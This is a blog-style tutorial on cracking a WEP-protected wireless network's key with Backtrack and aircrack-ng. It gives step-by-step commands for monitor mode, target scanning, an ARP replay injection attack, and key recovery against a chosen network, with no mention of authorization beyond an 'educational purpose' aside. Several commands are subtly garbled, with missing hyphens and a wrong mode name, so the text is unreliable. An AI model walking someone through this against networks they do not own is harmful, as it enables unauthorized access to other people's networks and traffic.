In this tutorial Ill demonstrate how to crack a wireless password with WEP encoding.
##Lets get started
For this purpose we are going to use the live cd distribution Backtrack 4 (could use version 5 as well) and some of the applications in it.
**Note:** You need to go in root first. For this purpose type su and type your password.
Once weve got our Backtrack up and running its time to open a terminal and pass over to mode monitoring using the following command:
```# iwconfig wlan0 mode monitoring```
**Note:** If some sort of error occurs type # iwconfig in a terminal to check for your wireless.
After that its time to scan for a wireless network which we will compromise with educational purpose. This time we will use the command:
```# airodump-ng wlan0```
![Image](http://store.picbg.net/pubpic/D5/68/be11f84f0e27d568.jpg)
Once youve found one, abort the process with Ctrl+C. Now when we have got our target its time to collect some information about the network. First of all copy the MAC Address of the access point which stands for BSSID (should look something like 00:15:EB:E7: ). Another thing is that we need to know the channel its currently working on (could see that under CH e.g. 6). So lets gather our information with airodump-ng.
```# airodump-ng w wep c 6 bssid 00:15:EB:E7: wlan0```
![Image](http://store.picbg.net/pubpic/43/2C/8875fd4ff599432c.jpg)
Now we need to open another terminal in which we will use ARP Reply attack to increase the amount of data packets and gather the initializing vectors or IV of the earlier chosen Access Point.
```# aireplay-ng -3 b 00:15:EB:E7: wlan0```
![Image](http://store.picbg.net/pubpic/E1/EE/b15c84ed10ebe1ee.jpg)
Lets go to terminal 1 again and have a look at the data packets. We need to have collected over 20 000 packets. If so abort both airodump-ng and aireplay-ng.
Now we have everything required to decode the key of the wireless network. We do that with aircrack as shown below:
```# aircrack-ng wep-03.cap```
![Image](http://store.picbg.net/pubpic/7C/01/537f3d09952d7c01.jpg)
Then you should see that the key has been decrypted 100% successfully and the key itself.